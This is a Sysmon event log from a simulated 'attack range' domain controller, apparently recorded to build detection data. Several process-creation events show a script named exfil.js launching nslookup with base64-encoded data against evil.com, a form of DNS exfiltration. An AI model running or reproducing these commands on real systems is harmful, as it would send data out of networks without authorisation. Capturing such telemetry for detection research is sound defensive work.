14:21:52.237{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.237{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-7D46-000000005F02}1736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.237{2E1864BB-1900-629A-7B46-000000005F02}60166576C:\Windows\system32\cmd.exe{2E1864BB-1900-629A-7D46-000000005F02}1736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.247{2E1864BB-1900-629A-7D46-000000005F02}1736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1900-629A-7B46-000000005F02}6016C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzolybhl.tmp 2>&1 10341000x8000000000000000215916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.206{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-7C46-000000005F02}4228C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.206{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-7C46-000000005F02}4228C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.200{2E1864BB-1900-629A-7C46-000000005F02}42282652C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-7B46-000000005F02}6016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.168{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-7C46-000000005F02}4228C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.153{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.153{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.153{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.153{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.153{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-7B46-000000005F02}6016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.153{2E1864BB-18E0-629A-6742-000000005F02}39767300C:\Windows\System32\WScript.exe{2E1864BB-1900-629A-7B46-000000005F02}6016C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.162{2E1864BB-1900-629A-7B46-000000005F02}6016C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzolybhl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.153{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhefz.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.105{2E1864BB-1900-629A-7946-000000005F02}81404012C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-7A46-000000005F02}7152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.084{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.084{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.084{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.084{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-7A46-000000005F02}7152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.084{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.084{2E1864BB-1900-629A-7846-000000005F02}20563288C:\Windows\system32\cmd.exe{2E1864BB-1900-629A-7A46-000000005F02}7152C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.093{2E1864BB-1900-629A-7A46-000000005F02}7152C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1900-629A-7846-000000005F02}2056C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhefz.tmp 2>&1 10341000x8000000000000000215896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.068{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-7946-000000005F02}8140C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.068{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1900-629A-7946-000000005F02}8140C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.052{2E1864BB-1900-629A-7946-000000005F02}81404012C:\Windows\system32\conhost.exe{2E1864BB-1900-629A-7846-000000005F02}2056C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.037{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-7946-000000005F02}8140C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.021{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1900-629A-7846-000000005F02}2056C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.021{2E1864BB-18E0-629A-6742-000000005F02}39761080C:\Windows\System32\WScript.exe{2E1864BB-1900-629A-7846-000000005F02}2056C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000215890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.694{00000000-0000-0000-0000-000000000000}3292<unknown process>-udptruefalse127.0.0.1-51313-false127.0.0.1-53domain 10341000x8000000000000000215889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.021{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:52.021{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 